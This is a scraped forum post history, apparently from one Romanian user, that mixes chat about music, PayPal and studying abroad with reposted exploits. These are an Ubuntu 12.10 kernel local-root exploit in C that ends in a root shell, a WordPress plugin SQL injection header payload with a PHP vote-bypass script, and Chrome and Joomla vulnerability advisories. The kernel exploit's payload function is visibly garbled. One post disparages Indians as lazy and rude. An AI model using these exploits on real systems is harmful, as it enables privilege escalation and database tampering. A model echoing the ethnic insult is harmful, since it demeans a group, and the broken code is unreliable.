[Noul Design FaceBook]

Folosesc facebook pentru site-uri, si nu am vazut inca noul look. Mersi pt informatie, stiam ca vor schimba designul...

-Gonzalez

[Ubuntu 12.10 64bit Local Root]

Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3)))
)
{
  commit_creds(prepare_kernel_cred(0));
  return -1;
}

char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

int main() {
  int fd;
    unsigned long mmap_start, mmap_size = 0x10000;
  unsigned family;
  struct {
    struct nlmsghdr nlh;
    struct unix_diag_req r;
  } req;
  char  buf[8192];

  if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
    printf("Can't create sock diag socket\n");
    return -1;
  }

  memset(&req, 0, sizeof(req));
  req.nlh.nlmsg_len = sizeof(req);
  req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
  req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
  req.nlh.nlmsg_seq = 123456;

  req.r.udiag_states = -1;
  req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

  /* Ubuntu 12.10 x86_64 */
  req.r.sdiag_family = 0x37;
  commit_creds = (_commit_creds) 0xffffffff8107d180;
  prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
    mmap_start = 0x1a000;

    if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
    MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

    printf("mmap fault\n");
    exit(1);
    }

    *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
    memset((void *)mmap_start, 0x90, mmap_size);
    memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));

  send(fd, &req, sizeof(req), 0);
  if(!getuid())
    system("/bin/sh");
}

[Bani online!]

Prima data fa ceea ce iti place, nu invata programare doar ca e platit mai bine decat x. Fi un freelancer cu talentul tau. Programarea e cam grea pentru inceput, dar merita sa o stii, niciodata nu stii ce ocazie ti se iveste. Am multi prieteni programatori care acum traiesc in America. Au ajuns acolo cu ajutorul firmei la care lucrau.

Daca nu sti sa faci nimic, i-au de la zero, citeste tutoriale si asa mai departe pana inveti un lucru, si perfectioneaza-l. Cand e vorba de clienti, fi sigur pe tine si livreaza proiectul 100%.

Nu uita, fa ceea ce iti place.

-Gonzalez

[Learn to Code for Free With These 10 Online Resources]

1. Code/Racer

Made by the team at Treehouse, Code/Racer is an online racing game that forces you to learn to code quickly to get ahead on the race track. Beyond this racing game, Treehouse boasts more than 650 instructional videos; as you complete courses, earn badges for your accomplishments.

2. MIT OpenCourseWare

MIT has opened all of its course content to web audiences, so anyone, anywhere can learn from one of the top American research institutions. Think about it: An MIT education without the student loans or cut-throat application? Not too shabby.

3. Udacity

Udacity believes today's higher education system is broken. Education is no longer something that happens once in a lifetime, but rather is a lifelong experience. That's why it has ported loads of computer science, math and physics courses online.

4. Mozilla Developer Network

The Mozilla Developer Network is a resource-rich collection of documents about web development, made for anyone, from expert programmers to students just starting out. MDN is a wiki, meaning anyone can edit its pages with corrections and updates.

5. The CodePlayer

On The CodePlayer, watch interactive presentations that explain how people built things from scratch. Once you become a coding pro, you can add your own presentations to teach others what you know.

6. Coursera

Online education giant Coursera brings courses from dozens of top universities online, and lets anyone take them for free. Coursera classes are now available in five languages, English, Spanish, French, Italian and Chinese, and are taught by professors from 62 universities.

7. Codeacademy

Unlike some of these other online education platforms, Codeacademy focuses solely on teaching coding. You can choose from courses grouped into eight tracks: APIs, Ruby, Python, JavaScript, jQuery, PHP, web fundamentals, or combine languages into projects.

8. Khan Academy

Khan Academy brings millions of students from around the world together to learn all sorts of digital skills, from coding to calculus to computer science theory. This means you can become an expert coder and an expert mathematician in the same place.

9. Learn Python the Hard Way

Learn Python the Hard Way offers free PDFs, though, if you want to take the video version of the course, you'll need to fork up $29. What does learning the "Hard Way" mean? The number-one rule is that you can't copy-paste; you must type out each of the lessons in order to teach your hands the language.

10. HTML5 Rocks

HTML5 Rocks is a one-stop guide to learning HTML5, written by tons of contributors who work for Google, Adobe and a bunch of other places. As an HTML5 Rocks student, you'll learn from slides, presentations and videos.

[Paypal negative balance]

Asta nu stiu, nu ar fi normal sa scapi cu asa o suma, de exemplu $200-300, nu ar fi corect, cel putin dupa mine. Cred ca Paypal te va contacta sa platesti suma respectiva. E bine sa nu ai in "-" niciodata. Ti-am spus: daca ai in "-" cand vei primi bani in cont, acei bani vor inlocui suma in "-". Sfatul meu e sa nu ai niciodata bani in "-" in cont.

-Gonzalez

[Paypal negative balance]

Daca planuesti sa folosesti contul, atunci cand vei primi bani pe el, vor disparea -30$ din banii pe care i-ai primit, din pacate, am mai fost in situatia ta, si e naspa de tot. M-am invatat minte ca indienii nu au voie pe paypal, nu au acces; si nu mai fac afaceri cu ei + is persoane lenese si nesimtite.

-Gonzalez

[google reader no more from 1st of july]

RSSOwl all the way.

-Gonzalez

[Staff pentru un forum de warez.]

Trimite un PM sa vad site-ul te rog. Eu nu mai sunt in warez, si nu am timp sa te ajut. Vreau doar sa vad site-ul de curiozitate.

-Gonzalez

[Ce ascultati acum?]

Parazitii - In Jur.mp3

-Gonzalez

[Seo]

Test, test and test.

-Gonzalez

[XSS Carabinieri]

-Gonzalez

[Ce ascultati acum?]

FREDDIE GIBBS "Do Wrong pt. 2" OFFICIAL HQ MUSIC VIDEO

-Gonzalez

[Google Chrome Silent HTTP Authentication]

# Exploit Title: [Google Chrome Silent HTTP Authentication]
# Date: [2-5-2013]
# Exploit Author: [T355]
# Vendor Homepage: [http://www.google.com/chrome]
# Version: [24.0.1312.57]
# Tested on: [Tested on: Windows 7 & Mac OSX Mountain Lion]
# CVE : [n/a]

VULNERABILITY DETAILS
The latest version of Google Chrome (Tested on Version 24.0.1312.57)
fails to properly recognize HTTP Basic Authentication when injected in
various HTML tags. As a result of this behavior Chrome will not alert
the user when HTTP Basic Authentication is taking place or when
credentials are rejected. This behavior is particularly concerning
with respect to small office and home routers. Such devices are easily
brute forced using this method. Many of these devices have the default
password enabled which brings me to part II of this bug. Silent HTTP
Authentication allows the attacker to log into the router and change
settings with no alerts and or warnings issued by Chrome. The end
result allows an attacker to brute force the router login, connect to
the router, enable remote administration and of course control all
information on the entire network via DNS attacks etc.
REPRODUCTION CASE
I have attached the following files:

sploit.txt - Indicates the buggy code.
jquery.js - Used for real world scenario but not needed for bug.
brute.js - Real world attack scenario for this bug.
index.html - HTML Attack Page
attack.php - Payload file for Linksys Routers.

VERSION
Chrome Version: [24.0.1312.57]
Operating System: [Tested on: Windows 7 & Mac OSX Mountain Lion]

CREDIT
T355

IMPACT
The impact for this bug is enormous. Tens of millions of home routers
can easily be completely compromised. Distributed brute force attacks
can be performed on any HTTP Authentication portal.

RECOMMENDATIONS
Reference how Firefox and Safari handle the attached code.

PoC: http://www.exploit-db.com/sploits/24486.tar.gz

[Reversing a Botnet]

Aveam nevoie de asta, mersi.

-Gonzalez

[bulldog englez]

http://www.publi24.ro/anunturi/animale/caini/bulldog-englez/
http://www.animalutul.ro/anunturi/caini/bulldog-englez/
http://www.canisapremium.ro/caini_bulldog-englez-de-vanzare_52/

-Gonzalez

[Forumul se incarca greu]

La mine merge bine, se incarca repede.

-Gonzalez

[Social Bookmarking]

Mai bine te axezi pe .com, si faci un site interesant. Am vazut ca pe .ro nu sunt asa de multe site-uri cu traffic.

-Gonzalez

[Ce ascultati acum?]

Parazitii - Am Comis'o Din Nou.mp3

-Gonzalez

[Ce ascultati acum?]

Parazitii - Am Comis'o Din Nou.mp3

-Gonzalez

[Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities]

# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4



Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


So let's take a look in the DB

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)


Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive


And the result is:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================


# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4


Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.

A simple POC is made in php.

<?PHP

define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
for($i=0;$i<1;$i++) lvlup();

function lvlup(){
    global $url;
    $header = "GET ".URL." HTTP/1.1 \r\n";
    $header.= "Host: ".$url['host']."\r\n";
    $header.= "Accept-Encoding: gzip, deflate \r\n";
    $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
    $header.= "Connection: close \r\n\r\n";
    $socket  = socket_create(AF_INET, SOCK_STREAM,  SOL_TCP);
    socket_connect($socket,$url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}

?>

[Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability]

-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------


[-] Software Link:

http://www.joomla.org/


[-] Affected Versions:

Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.


[-] Vulnerability Description:

The vulnerable code is located in /plugins/system/highlight/highlight.php:

56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;

User input passed through the "highlight" parameter is not properly sanitized before being used in
an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the
application scope. Successful exploitation of this vulnerability doesn't require authentication,
but requires the "System Highlight" plugin to be enabled (such as by default configuration).


[-] Solution:

Upgrade to version 3.0.3 or 2.5.9.


[-] Disclosure Timeline:

[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1453 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-03

[Idee]

Cauta o nisa buna, fa keyword reseach si lanseaza un site.

-Gonzalez

[Facultate Danemarca - Intrebari]

Tot la profilul ales de tine; in 2010 parca.

-Gonzalez

[Facultate Danemarca - Intrebari]

Tot la VIA, dar trebuia sa dau parca 2 examene, unul din matematica si altul nu mai stiu din ce.

-Gonzalez

[Facultate Danemarca - Intrebari]

Imi trebuia matematica, pe care eu nu o stiam, si alte studii. Trebuia sa dau examen de intrare. Am auzit ca e pe gratis sau cu taxa mica parca.

-Gonzalez